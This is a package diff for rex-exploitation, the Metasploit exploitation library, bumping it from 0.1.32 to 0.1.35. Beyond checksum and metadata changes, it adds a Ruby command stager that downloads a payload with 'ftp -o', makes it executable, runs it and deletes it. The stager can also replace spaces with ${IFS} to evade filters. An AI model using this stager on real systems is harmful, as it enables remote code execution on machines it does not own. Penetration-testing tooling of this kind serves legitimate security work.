rex-exploitation 0.1.32 → 0.1.35

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: ea51688315db43ddb2a980d72a715dbe8f7eaf59613df153392b2bcb10735eb0
4
- data.tar.gz: d2278d504b70b8db76031c45669a87ae25377c595e318efae605732beaaf79a6
3
+ metadata.gz: f8c5dd5d5f1eb9ec413185374a38cd0e3cc5bfd021d12e31883a41214a9b16e7
4
+ data.tar.gz: 5b207563c2e70275c99b0facc43cc93c21237aa8901d88bc1e931f52f820ebaf
5
5
  SHA512:
6
- metadata.gz: c3dcf1ca77715c531385068d818183d3a130551a9505fb281be4cc26a3d24b9166235acce86474370195eec466b1a416fe83b0286fd787bd393956317733d827
7
- data.tar.gz: f7c73e02aca2da10019466617de38c0ca728c592a0420faaee0972911364be5c00673b694f1ad2510728aa94aa72230ef9cdf8311716c4528dbf6a2ebe3b7172
6
+ metadata.gz: 7307d2354918f95ff10582008e06edd044d2808e6a0fae3cf2f3eca99270ce0132dc51974c7bf4efbb5362eee0c2c562012c9f4858da7da5b4defa1f874f6bde
7
+ data.tar.gz: cec19fc06107b7cd0ed438cc504d36c5df6b4b6c458baffb4b71f6ca1da496f44c29c941ed0b51530dba12240bd7a539c76bee04d01dfe84dde61eeacbbf3a72
checksums.yaml.gz.sig CHANGED
Binary file
@@ -0,0 +1,49 @@
1
+ # -*- coding: binary -*-
2
+
3
+ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
4
+
5
+ def http?
6
+ true
7
+ end
8
+
9
+ def user_agent
10
+ /ftp/i
11
+ end
12
+
13
+ def generate(opts = {})
14
+ if opts[:payload_uri].nil?
15
+ raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
16
+ end
17
+
18
+ opts[:temp] ||= '/tmp'
19
+ opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
+
22
+ super
23
+ end
24
+
25
+ def generate_cmds_payload(opts)
26
+ # -o: output file name (argument must be before URL)
27
+ ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
28
+ end
29
+
30
+ def generate_cmds_decoder(opts)
31
+ cmds = []
32
+
33
+ cmds << "chmod +x #{@payload_path}"
34
+ cmds << @payload_path
35
+ cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
36
+
37
+ cmds
38
+ end
39
+
40
+ def compress_commands(cmds, opts)
41
+ cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
42
+ super
43
+ end
44
+
45
+ def cmd_concat_operator
46
+ ';'
47
+ end
48
+
49
+ end
@@ -14,3 +14,4 @@ require 'rex/exploitation/cmdstager/curl'
14
14
  require 'rex/exploitation/cmdstager/fetch'
15
15
  require 'rex/exploitation/cmdstager/lwprequest'
16
16
  require 'rex/exploitation/cmdstager/psh_invokewebrequest'
17
+ require 'rex/exploitation/cmdstager/ftp_http'
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.32"
3
+ VERSION = "0.1.35"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.32
4
+ version: 0.1.35
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2022-07-11 00:00:00.000000000 Z
96
+ date: 2022-07-18 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -263,6 +263,7 @@ files:
263
263
  - lib/rex/exploitation/cmdstager/debug_write.rb
264
264
  - lib/rex/exploitation/cmdstager/echo.rb
265
265
  - lib/rex/exploitation/cmdstager/fetch.rb
266
+ - lib/rex/exploitation/cmdstager/ftp_http.rb
266
267
  - lib/rex/exploitation/cmdstager/lwprequest.rb
267
268
  - lib/rex/exploitation/cmdstager/printf.rb
268
269
  - lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
metadata.gz.sig CHANGED
Binary file